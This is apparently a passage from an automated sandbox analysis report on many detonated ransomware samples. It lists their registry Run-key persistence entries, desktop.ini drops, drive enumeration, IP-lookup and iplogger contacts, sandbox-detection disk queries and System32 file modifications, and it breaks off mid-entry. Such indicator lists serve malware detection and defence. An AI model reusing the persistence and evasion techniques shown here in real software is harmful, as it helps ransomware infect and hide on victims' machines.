"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\msconfig.exe" Trojan-Ransom.Win32.Foreign.myha-ff8a5433014a2728854d1d8bf9ea66af18ae0b3cee9c5d671cdff59426a0843d.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" Trojan-Ransom.Win32.Shade.pfi-2b703b07e6eba207d2e29360e1f5b48d2d75c0c7d927d2cce973204021188b82.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pr = "C:\\Program Files (x86)\\Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe" Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\System Monitoring = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\xk = "C:\\Windows\\xk.exe" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services = "C:\\Windows\\405066960303840\\winsvcs.exe" Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\XKOQon = "C:\\Users\\Admin\\AppData\\Roaming\\database.exe" mshta.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\LogonAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services = "C:\\Windows\\405066960303840\\winsvcs.exe" Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PremiumOs4 = "C:\\ProgramData\\Microsoft\\Windows\\PremiumOs4.exe" Trojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\README = "\"C:\\Program Files (x86)\\Windows NT\\Accessories\\wordpad.exe\" \"C:\\Users\\Admin\\AppData\\Roaming\\#Decrypt_Files_ReadMe#.rtf\"" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\MSconfig = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\msconfig.exe" msconfig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\18935 = "\"C:\\Users\\Admin\\Desktop\\00361\\Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe\"" Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\MSMSGS = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 64 IoCs
description ioc Process File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\Music\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-3551809350-4263495960-1443967649-1000\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\Searches\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Public\Music\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3551809350-4263495960-1443967649-1000\desktop.ini Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini IEXPLORE.EXE File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\7CO3PKGI\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9C9T5AL\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3551809350-4263495960-1443967649-1000\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification F:\desktop.ini Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe File opened for modification C:\Users\Admin\Videos\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Public\Downloads\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File created C:\desktop.ini Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe File opened for modification C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROVWYKHE\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Public\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification F:\desktop.ini Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\YQ90JXIE\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\63WZ73PY\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\Links\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-3551809350-4263495960-1443967649-1000\desktop.ini Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe File opened for modification C:\$RECYCLE.BIN\S-1-5-21-3551809350-4263495960-1443967649-1000\desktop.ini Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3551809350-4263495960-1443967649-1000\desktop.ini Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe File opened for modification C:\desktop.ini database.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Public\Desktop\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L2BFB2JG\desktop.ini Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe File opened (read-only) \??\J: Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe File opened (read-only) \??\K: Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe File opened (read-only) \??\R: Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: explorer.exe File opened (read-only) \??\L: explorer.exe File opened (read-only) \??\Q: Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\V: UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe File opened (read-only) \??\L: Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe File opened (read-only) \??\W: Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\T: explorer.exe File opened (read-only) \??\S: Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe File opened (read-only) \??\R: Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe File opened (read-only) \??\J: UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe File opened (read-only) \??\E: Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\S: explorer.exe File opened (read-only) \??\U: UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe File opened (read-only) \??\F: Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe File opened (read-only) \??\H: Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe File opened (read-only) \??\P: UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe File opened (read-only) \??\W: Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe File opened (read-only) \??\L: Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe File opened (read-only) \??\K: explorer.exe File opened (read-only) \??\O: explorer.exe File opened (read-only) \??\A: UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\N: Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe File opened (read-only) \??\U: Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe File opened (read-only) \??\X: Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe File opened (read-only) \??\Y: UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe File opened (read-only) \??\U: Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe File opened (read-only) \??\Y: Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe File opened (read-only) \??\S: Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe File opened (read-only) \??\I: Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\G: Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe File opened (read-only) \??\O: Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe File opened (read-only) \??\K: Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe File opened (read-only) \??\I: explorer.exe File opened (read-only) \??\N: UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe File opened (read-only) \??\P: Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe File opened (read-only) \??\M: Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe File opened (read-only) \??\Y: explorer.exe File opened (read-only) \??\R: UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe File opened (read-only) \??\S: UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe File opened (read-only) \??\Y: Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe File opened (read-only) \??\P: Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe File opened (read-only) \??\H: Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe File opened (read-only) \??\T: UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe File opened (read-only) \??\G: Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe File opened (read-only) \??\N: Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe File opened (read-only) \??\P: explorer.exe File opened (read-only) \??\Q: Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 146540 iplogger.com 146545 iplogger.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 133920 whatismyipaddress.com 135140 whatismyipaddress.com 136051 whatismyipaddress.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe -
pid Process 2304 arp.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\fr-FR\Licenses\_Default\Starter\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_hash_tables.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_CommonParameters.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_Language_Keywords.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_functions_advanced_parameters.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\de-DE\Licenses\_Default\EnterpriseN\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnhp003.inf_amd64_neutral_4480210763997eb4\Amd64\hpd4200t.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\ja-JP\Licenses\eval\StarterN\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnky309.inf_amd64_ja-jp_afbb421e3dc1cb6b\Amd64\kyw7qur8.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\en-US\lipeula.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_Comment_Based_Help.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification 